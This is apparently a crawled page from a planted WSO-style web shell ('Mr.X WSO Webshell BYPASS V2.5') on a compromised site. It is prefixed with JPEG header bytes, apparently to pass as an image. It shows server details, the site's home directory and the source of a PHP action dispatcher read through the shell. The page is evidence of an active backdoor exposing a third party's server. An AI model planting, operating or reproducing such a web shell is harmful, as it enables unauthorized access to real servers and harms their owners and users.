����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 06:40:05 1999.30 GB Free: 76.53 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
include('../admin/config.php');
$actions = array('logout', 'add_favorites', 'remove_favorites', 'rss', 'embedVideo', 'removal_request', 'report_content', 'report_comment','custom_rss', 'reportVideo','resendVerification');
if(in_array($_GET[action],$actions)) {
include($basepath.'/includes/inc.'.$_GET[action].'.php');
}
else {
exit('Error: Invalid Action');
}
?>